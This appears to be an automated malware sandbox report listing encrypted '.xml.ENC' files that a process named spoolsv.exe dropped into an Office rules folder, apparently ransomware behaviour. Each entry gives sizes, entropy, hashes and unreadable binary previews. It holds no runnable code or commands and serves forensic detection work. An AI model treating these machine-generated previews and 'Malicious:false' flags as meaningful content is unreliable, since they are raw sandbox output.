                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.*....Z2...y*.M.9..1.;.4....P.3...gr.0.r1.tr_.......h..r.I*.Z.....t.M..h..%D..8....9..mg..!S.........\.,%..F@.V|.^0 ..8.MsJ.N.Y.E..V9:....fx.g........ggc.Y.".}q....\AI...28. .RV.g.1....K.z.O.Q.)..0;../mk.0.......#.O..QT....vEN.0..`..o.,.S..q.p...........o..v.....aX36B.....g]s..t.o..x..I...........iJ.kX./...."...{`.G....QC..*!..0.Z.....5.:..H.......g...0.0,.z.}...8{&Ov.).r..0.i...HY....&=.....qh.LPy._...?C}..y.Q..!X...X.(i.$z....Z.B...^./.V...P..M......^..*e..Q ..$B.C...Gx]_....fy. e....P.......a.a........,.c5E..q......6P...~0...=D.a. ,..o.'5QH..].9it.b...2.oJI.=.....n..iQ.f.c...u...[.V..S...p,ZvA'B..D.\.4..#Cr>.+z.[(4......6...[.!FZ.(.'...4.<..+...a}....d...{h...KO...+1`.F%.v......T./...k...>... ....r0O.2.*...$..3 N...uS..O.o.._.....9k.....h>.Hf.z-.|jT.P..........j..|..<Sg...7.=@...|.t.. ..]q.}.6........n.<79@@a.......cb...C[.F...P...&J..(.ITuZ..e.+.k6..CM..z.1......X.q.O.Qe.(..?.y\...y...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120607v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):208
                                                                                                                                                                                                                                                      Entropy (8bit):7.006671629084364
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s25Ja+jrLRVGbZgnKaJZjYXIRzaAzWB0:/7s21RVGbZiB7YXSzW+
                                                                                                                                                                                                                                                      MD5:9B5F17C08A8A8CAB8535C382F2C58471
                                                                                                                                                                                                                                                      SHA1:9C3CF9E7FC6E560744C5FBF6B24C9A4C6AEB5C23
                                                                                                                                                                                                                                                      SHA-256:9DBAF38DA38B913A9EE3D6B912CF7D55416BE94575B2029BF8839C6ED212104D
                                                                                                                                                                                                                                                      SHA-512:300F7234A81915812C79BF4C2863E4103FAEC870F4C0F087A2682B79F01AA3DE0A2805B6D1E466C3266A45A97EF1D6A3FD138595DAE1762C2E9F933137F1FC5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.%.g...L#.,.n.........d...f..4..W.._C..KW..s ..}..S.....?.+..\.......A..f..1...c..T.&....%\&ME.ga...sz,t..wo...H[..*.P........Q....c..f.1.|K.@..s...d~!..W

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120608v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2176
                                                                                                                                                                                                                                                      Entropy (8bit):7.906082753738502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/Rw9jSQa3o8Vf6YDLNGOK8MYuRlQTh/3CNN45DE43aez:5QSQa3Ff64LdQFRlQ5cwz
                                                                                                                                                                                                                                                      MD5:A1A5E9BF0E7825690F6821D56C323040
                                                                                                                                                                                                                                                      SHA1:95436B6089CC47F3DDA40C52A7EFD598C9AFEFDE
                                                                                                                                                                                                                                                      SHA-256:55DACB8748F3CBA2CE51ED922477047A51901A4EA5D57A482B6FA5B5E7C6C6D7
                                                                                                                                                                                                                                                      SHA-512:AF1AC1DDC7D4F8CC8003C250217C0A2B82C4451707024BD743635B3472524BE69960118D13CD9F2C71A61FB6B56C7BC76B75EAF504F007D399B8524E1332BA93
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....S..1V,>...O..(-.......b..g+9.......7R.3....8$.%..h4.l..x.2...=9L..(W.._0......t..q,.3.A..O.xt6(.g..CF.....D:.S.k.s((...K................=-x..W.v^C.....|..`.By.^..PF"?_.e...=.l.*.Q,t.W........:h.I...;$(.z.Tt.U.]...).....A+...wV.2M.j.....u.|.|..Y:W..Y..!l.........0.-..}55...d....b...x....3./O?.(..+..{......K.(Y2..0.L........)e.?.q...+.5.......e#..........X..d..|....l.I.9. Vc.J.c..2dj.riw.....-L.4...H...{.....I.0....(........`$^J.Q.z2....@/..R.!'.>.:.Z.9<.E.kF'#.TH:.Pz...0.UM[...)..=]Nn...X......E..T.G......Y.Ez.n...........M.DA8?..d..{Z_..%..w4t..j ..v.k....._:.&+....].9.`U. ,.0.Ax.O4+....]...]..$=.5X.TC.Lc.F....R...5.7s.P"r6....\....0.....g..f...e.&xw.(.y.gqX....umTW..l.D...=O.B7|0_.+.j....Vo....w}..+.x..F;*......og..^Pl9....0.U..0..w.......=..<..Y2......_..S.....|..\...,.w@.G.....V..]*.^....?.Q.... BZ).mI..v.i.:.^..{.,.V.....W..z...ges...<.<.Q..~..$...s.'.{.0.-..T.....`Y.b...j

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120609v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.523605946800443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2r8JSF8vlt2TgNHmGgTzCGR8b43ycsB:/3JFIETg1mGSVO
                                                                                                                                                                                                                                                      MD5:1F1DCA8F647F851CBB113802658695FE
                                                                                                                                                                                                                                                      SHA1:5E74976247BBE2862DE433EDD45A8CBC89E212DA
                                                                                                                                                                                                                                                      SHA-256:25FDFA1C0D1016F06E4C570DF41D8B4AF1262CEE5468CE9468D7477EC0B16EF3
                                                                                                                                                                                                                                                      SHA-512:AA25E4FD7A81DBB936EF315612EDA3921E93157D447E54D7367998F0CBACC4361584B6B9140B0AC829C68C79293DE11500B97A7D7431A3AC4BC6A70F65246AE1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.,.IH.8.S............@M..0.f..NV..J&..a.7P...'...}w....^.i/..3....O....\<..$Ez&...</..l.e...eNy.?3.pD.....w.....K#Z......U..\I.i.....5.MU..)...<.1.S,d...x.<1.f..yI..;5..`..2...Q.7.......y..}u....E.kCZ.......m&.F.../.1hf.......W...C#.8..O..N5...=.{..%Kj]....j.....L...S&..X'...w...!.b..u.B.....O.....8...[..n..n.^.l.}...z...y......~..c..`0..+.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120610v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.524992075274403
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2OzR6Xch14LFbM+y8SfSKxFJ0Plhy8aoZcRcEnDh6qdLJ:/6zgi0m+4SFhvNZc2EDcS
                                                                                                                                                                                                                                                      MD5:00955731DE0D4B272D21401B6C631B87
                                                                                                                                                                                                                                                      SHA1:5AB82524445F75215666CA3AF8066A8970F47B8B
                                                                                                                                                                                                                                                      SHA-256:D0A46267F27B0EFA4EEF445DBA3E0374C4810906F52471E64F24ABABB74CE0B9
                                                                                                                                                                                                                                                      SHA-512:17974FB42D376A0AA540E8298F6598F656920BDCB7C577A3F83890222CC5D81F539D6C226F7642AE305732009CB10459898115090E307732B60C5949FC994232
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..cI..@$h.h.......w<..k....l.....9 %..........9...w..>.b...\..4......'..z..`3..ex.v@.c.,...L.Ko..TF.......x8w2+....b..g>.K.!..u\r{....<x.3.*....,......-.._.c...!......G...n-....A......0..k3.<...J..w..P.W.....@@....]e.&@+.X..z.j...0t@^....o..........FM|...r..(P..n^...O.T...g0..@.e..I7.ye..`q....^."...y./<Y.H....&m.2#....6ob;#.<.fr.....D...1XNY.z........_..j.....5wX.....4.s.no......F.(H.z....Fr..F..Tq...4.s~t

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120611v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.492626392479859
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s279my5Z5XGuY9GpvguzyP0nac/v0+h7SIW:/9/lGPyIu2PhcUYGIW
                                                                                                                                                                                                                                                      MD5:B1BF69F0D964A4D90B0A0D83C35D4FFF
                                                                                                                                                                                                                                                      SHA1:E83B9D153C75DF2BF39B59C77230782923444BB0
                                                                                                                                                                                                                                                      SHA-256:AC48512F7B798CDA64B0F31BE268F95F5C5039C37293E5E08D86FAC5248AD59E
                                                                                                                                                                                                                                                      SHA-512:1443EA4CD96881573D4EF91556BB9EF9BB0F4DCBECF991836D4B6C9E24173AB82923F75A441ECCBF85F38EC78FA3E8B72D1FB85876B2D03ECE07375A21EBC848
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.+...}......M..$...O|....yDi...0...T.. ..%*..~..f.....5....S..3.i.t.K...i...p..7u...Y..Mr8V.<..(.-.OFu..U... ....f.....o.v+...#z{w.S....a.S.Q...y..._............k.w.c.......C..t...0..BCk...{U.!..G..a.U.N.s....h)...Y.S....3...{..+.&.Y....-..O?.........2;.........R...........9..Q|N.;.,N...\.|.a].&_...V....y...u...4..O....d.O'q.7..........o.j..Z(.G

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120612v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.53173798640468
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2Ly7jSkwnDTbj1zlq80FwbPzjKngNSNOF8Qn:/HSjS9u8jTz2OFF8Q
                                                                                                                                                                                                                                                      MD5:08FE3C0DF31AE3B4B287F69756DD5D7F
                                                                                                                                                                                                                                                      SHA1:6CF73D72C35E36ABA794A9679455EA2E660EB9A5
                                                                                                                                                                                                                                                      SHA-256:AF3165C1C9C0678235F0B5709F4794DCCA79BF40FAF73DFA34F4F7856D39EBA9
                                                                                                                                                                                                                                                      SHA-512:BEC7D6ADC15BCF6E62FE721A12945B09C0610636E824D1DAD44DAFE721CE071DD4C32A31849759D6BD966AE3453084DD5B3951B2B10A0C02E8C7B0A54928AC52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..P..>N.B...qu......sI<I.e...^.[.N..W.K.M..[......[....;e)..|i\F..8A?......Q.....l.3a.j.......m....W....JT../q..k>..B.A..mW,/>9;..N..0.....c.e......y....9:.k.....D!...SC<.X.k!.f...=.4.M.0]..E..V.@T{.D....C..t......g k..MBF4.....p.).#..h.l56xY.7'.....e.......I......K8......:)9..!.....LB.v............. .81...-......{.!.W...4.h....i.W.7...U.S..M..@< ....>....=..c:2i.+...S..Y......1sE.m......:...zi..._...N..,..:Y..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120613v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):640
                                                                                                                                                                                                                                                      Entropy (8bit):7.665546091276004
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2qSt0ow/lDSMkaJszh4v6/ILZOP9158EKArOiK3AQ/sztAUKPCVc8c:/1Dw8MXxoIgD60ZKnEtAUKPl
                                                                                                                                                                                                                                                      MD5:640C189EC8D8CD7A630B68AB21BE0858
                                                                                                                                                                                                                                                      SHA1:361A938320AD5607CF6C8707AA2920BF60E8AB33
                                                                                                                                                                                                                                                      SHA-256:DEB6EB36991219750FDFC7C52197B8DD0B37B8792E33EB1E599593CEDE210C12
                                                                                                                                                                                                                                                      SHA-512:3D3BE3B8E91A82B2F7719A64FD972D2FB2E0403B220C64E9F48C50A99DFE5EAB62060BE0DA99D73315E7245E97B1C9988E627F5623E7657DDA14B33FC3A2D288
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.d9:..k7...=Y......D..#U.*><cO>.U..N#.pV....+.7.....i......8'}.....r....b.4&..-..T..J......p...w7.3..?.I...X^.E. Q...u.a..f..e...).H......H<.1..u=.k0.[...!....L_..U...z....S74..x.....e..../.?].1...R....(<.X`?(..u;..8...}n]j..._..X5..D..OL.`...p.4.).0.|....,.X......F.p.gz...)...=...Bq~i.Ix.3.J5.M...%.uu..,:.P!.Br.....F....t...?.#.h.Y.B.4.l`&..|...-....?.f...**mTd.W.4(...!+.ox....Gb..(.:."..t..[.8..<~..4...Or9/.f^.u.1}.P..(_Q...vr._..e.e....0....z....T.H.p6..O.....c..gWl...*4....."....i.`.......^-..V...J^M.[.....D[......,.p...+.y.FZ]..udW....}u..@SuH..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120614v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.542041144920325
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2cEfc2L7k8+7bixS2pDDYcWN+Iv5YXuEGn9aHt:/Rk2LY8+fR2p4jN+m5YX7CKt
                                                                                                                                                                                                                                                      MD5:2891EE49ADE09DF12F174BE3F1BC7E36
                                                                                                                                                                                                                                                      SHA1:55958A9744A20BF367C2FD942E3B4E728CAEB75F
                                                                                                                                                                                                                                                      SHA-256:3EAEABE6B14DB4AB931F25A1F36CF473FA6EA4E8C79AEA0819768628BAC5CC65
                                                                                                                                                                                                                                                      SHA-512:DF0D6EC398E74A85372FA7372A621F69493EA30A11DA3B3C19370171AA87CDEB32DB389BB0F9F6E096315328911F4C293EA0FAEB4C0E5CC99B92C302EC8F680F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.............. e.`...5.e.K...E...B....+>.b...../HP..z.7f 0.............H.Db...-..Q../..)Y >m867..d...t.8=.&.9<...A.@c.Z..,].G..W3.x+..Z.q..t.^.b....#xD{.......`.....8..Q.w...>.O....=M _.jj9a..]..nF|....}y:.!.9......ZR.U....i..5".......)T...Yu...=l.#.....8.>.........p...i...``B_.>..w..eru.......zH...B..%5..MsF..bP.P.#..Y...f..0d.U.q4Q..{..!r=#Az..4H.y.k.q...s.+,+.r."m.m=?.......u!.[/y..Qw..J.y....->.KG...8.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120615v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.4754669286538995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2Faw+YnLugLW4TDVMPAfkedsYXtiKMx:/Uua8W4TDaqH9Qx
                                                                                                                                                                                                                                                      MD5:536951F0288E0850F9B9027D4D6A353D
                                                                                                                                                                                                                                                      SHA1:30CF23E0A7CBE0D008800393CE50E0A8BBC26015
                                                                                                                                                                                                                                                      SHA-256:7C9DBFF2C15480892E1C39A7432EBD5ACF7DC2115B815C02EA7A0D46B83FDA97
                                                                                                                                                                                                                                                      SHA-512:342FC48E9B4C9B90FDA8B4684A449E208BEAAB450B4633925B00DE04EBF1DE11A88CBDD8533CC3FB1F38FB2DBC26FA7CDFA5FEB81333D7FCFFC67DA566D89016
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....wH...".+...1..o.$D........db..u..>..h...I.H2......(...|.9S......T..!7....jGK}_5../Sn...<.....d7...E.3"1.d.....i...o.?........18.8.u...R ..&.|.....IG...>=..TT"t.oP.>.ft...#..9T............<....F.a.ie.......L...e"l#.c.t.S.oq.C.\UO!........J..;,.t.T.<~.=.\gY8.V. .O...#.....p.0...t...)...........A....S>M.K..(0....W.Q...Unv....o...j...........p..#..U

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120616v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.632085935525174
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2AJ3VlJ2gGzD0+HgvDWNDoxhWIai39TboEnl4Qo7gOK4D:/EJ3VlJ2gGvhA7mUBtTDsE4D
                                                                                                                                                                                                                                                      MD5:DC95629F3D4B437C0662F2F5863955C8
                                                                                                                                                                                                                                                      SHA1:99942AE6BCB95A1BB39B8AF06DA9371918CC72B9
                                                                                                                                                                                                                                                      SHA-256:B99EED914C10169B3C29E2F343445CF025FB51DBAEC4DA848EFBEA85EDC0F661
                                                                                                                                                                                                                                                      SHA-512:C3ADEDD5258C3F6DE2657935B2FDD67312806458B78CF66C1CDDA34F5F6BE2B18E982AF31C334E6903D581B792EE23BFD061F4BE771526B52EDA598F5B690622
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.......ul....b.....*uA....O. =.d...{}B. .kdnK.E(.C..r..Tv.....U...l....d.fN....T.^.8-.9.h.Js..{.V.E.I_K...+|..K....#l..U#..8..)...../..b..$.@.wO{ .....N%-5...vc.$.....u.q........@tWu..mPcJ.@kaP..2-5X....}.8..[<UZ()S.0.F.v=@....@.,..GC.oy......Ll....HX..u......S..!<.Ko..Jz..4.....=.U.>b.H.M%.|.i&. 6.i."....1..W...xH[.R....*....o..Q..b....j6........%..[?K.A...%.....\I..N.....W!.7."..o....e}"R.B2Qx.....YP.|/l..;\..*..r...Q.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120617v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.529584428097934
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2X7wTzOyOA1lterw1PpfP02mbS0GiAtT6bss1Zt:/rCKydtecr/mm08+7Zt
                                                                                                                                                                                                                                                      MD5:0FC847524EB4326797347F94760D9EF6
                                                                                                                                                                                                                                                      SHA1:95658BE524E69A0B9AC6A480B9EF5D45FD7544DE
                                                                                                                                                                                                                                                      SHA-256:06CB193151024F169EC7FA7BDBF8060A73BDE2F0CC23E1D15F6B3D5F5DD4A189
                                                                                                                                                                                                                                                      SHA-512:742824D74EC5D3AE479F84446CEF8F13BAB917684AC98A20C61FBEEFE7465AD48AE25B9D2989C4163C137D8F6BE5E04A59E996BA67A1F2A58A0F84E5A9D8492E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..[....(.ke+...n=.5.8S.O.......X..G>.7i..F..l.....f'.....[y..r.]&hv.=..]Q_. ....P.-/..:..0.F....i.1C@l.. .A.......0...m.4..n.....n..u.dq.:.T...3.Z@/.....g..G.U."...2{.Z.!.S..52.../}.v.B.8}8{..".....lT....;[./.ANN.^.m.EalC...B.P.O..U.u...>.Wm.d......m...~.I.S.7..[....Z.~H....30....I).C.Q...=.\.:Y..f[..V......=...l...[UH|.M......mI.M.eq...c@.....F..%|...M!....I..8'.\

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120618v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.630922987949698
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s20gcu8usGWQ3+HOYkIR8oUug4GLgTTEZCSETszH2UNp3cQYLTVDtIcb76vn:/7s20buzV+uJjKLsZCazbHGIcb76+TU
                                                                                                                                                                                                                                                      MD5:ED107E0B9614507871372F9FDC363436
                                                                                                                                                                                                                                                      SHA1:3CDA9130F440F16120D368894CBF99E935523835
                                                                                                                                                                                                                                                      SHA-256:F43626B8EDF1D7E9C0789284AA02DB6537C0A626DB3D4DE0AF65E45B5C65DDC4
                                                                                                                                                                                                                                                      SHA-512:B0AD7EE14B1993BCBDA17F004AE967AAEAF890BF92CFD280131B38C4EF20D619BBAC81EC920A8581B58F86F5E971D4E227CB8938F0B1878333B6E89F6D118141
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..\y0M....3}*gQ......iX.9y..TjV...`:.|Y...l......\p.$Zko........P.T.gNZ...z.i...&.P...9......~,l.p.fQ.^.AM...'..Uw..E."d#....d..,u .u0Q..].j.`...zs..j@^...a.8UV'...y......^tH...4Ia...o.)_xw..n....Sg.b........r.....h....P.......}....W..x.......%.DG.w....+.%....sX...W....'.z2c.....R...!.<&....|.....*..I.-h.A...0...H/..f.NS.b.z.....{.m.2....t..z....k._..60G*#?.Kn....m.'.9...Y..#|...x<..F.(.U..|.&.P.....#U<KN.....G

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120619v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.516223222986549
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s261Ot9pzVP9vpzisXziQx8y+ZeWFs1nDxUAJgo8y5zmgk:/6qJlvphiQSy+ZRFstFJgot3k
                                                                                                                                                                                                                                                      MD5:DEF20B9554CCA632DED382CEAD7F2387
                                                                                                                                                                                                                                                      SHA1:2F9F56AB71C85759AEC44718F4DE0784D84A360F
                                                                                                                                                                                                                                                      SHA-256:6DAF5D162338B0D42FC23C14E6ECF0DB8543E0CE6CB386730C117B4073E091BA
                                                                                                                                                                                                                                                      SHA-512:EE4514C4DEAB1FCEBACF057E10A5265F149739F4F6A0634756356CDC83B601F68AFE3E0467F39AD294421EEE34463FF3919BD8508B87DFBB59DEA1A119FDA887
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....6.)@Z.}X3.(.7.<}..0~.'.h. ..3......r.<.Ox..7.,.0L...u8.L.6...E...........k-.sOy.t.....IE.D..A....<..y......i.R~....T......c"t/U..g}..PH.r![.l.n....$.........L....S.6.Z4x.i|..z.....7.J.Y(.$.6S..A|.@n}.O!....ZD.yh!.DQ....V....m.o.Q.{.k..r.........$.H.........cLe..*...d.."..#3Q*.p3.qO@aG.....J..;M...!.V...9..[.r4......OjGq...jr.a.2.i%....^\...u..b

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120620v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.553727895908729
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2pDHPnYDviy6l6QDXi6SW58+vX85Zb/j8IJXBj+54IgCY:/Fvvy0yhn+SZX8IRBamIgCY
                                                                                                                                                                                                                                                      MD5:3CEF80F1E1F0CDFFAC7B026764ADE118
                                                                                                                                                                                                                                                      SHA1:771E331AE858DF5F72F6F9E8D200DA42A966A0C4
                                                                                                                                                                                                                                                      SHA-256:651B99C395CFF3A0E224B7C72306221EA89334CC1F715F3326057B54DDF86DAF
                                                                                                                                                                                                                                                      SHA-512:746146EFD56458064254EC8A6E81A2B40AC32A44902D44D85D3A439EE7F3A201B695A12CB032D8A1E363D1BF2CCCA5604CE90F9355FB71670F173B5CE100A46F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...&..j..V..&.AR.I.....<xma..jy.sV.,c.........i%..BF/.v.F.Zg.%.....a..j....c.;...fde.ek?._C......2.F.........G..f.G'..B4M.GerX..QK..../.+.....$.G+f.....8....O..]...Q.NJ..:.m.N....`p....G....N@".#.=g...........Y.y.W...B#S.f...1:.8xC.1..;a.....c\HW#..B...Zv..~.?<..{...8.KUL.!..o....S........3;._.G..;k'...F..L.B..7..g.F...d.....c..]..z..d....}%...[..%q...X.9.a...6.8...}.%...@....H...)K..gW P..>6obbrI\.OE.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120621v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.439842363585549
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s23Uvbcw3YMnCpL1AncqiKFF86ldeIh:/oDcwoMnCH5qiKv8udey
                                                                                                                                                                                                                                                      MD5:45973062851F7AAB0498A9671A597A18
                                                                                                                                                                                                                                                      SHA1:94B2E669CFC46B5A1B2DE5CAD2FDAE521BFD3358
                                                                                                                                                                                                                                                      SHA-256:CDCB146967459FB85865C4EC06E9E0C736C8BA00E70542C48C2E2F19703AF895
                                                                                                                                                                                                                                                      SHA-512:6894BD2BD74C87AA661F5946DB955AE5E98C8C958772A05ABD587B9B2E8A3F1373FF833929F0B4F545D3CCA4C5D3FE9011CAFBE4D7F10E47C95F9362869336F6
                                                                                                                                                                                                                                                      Malicious:false
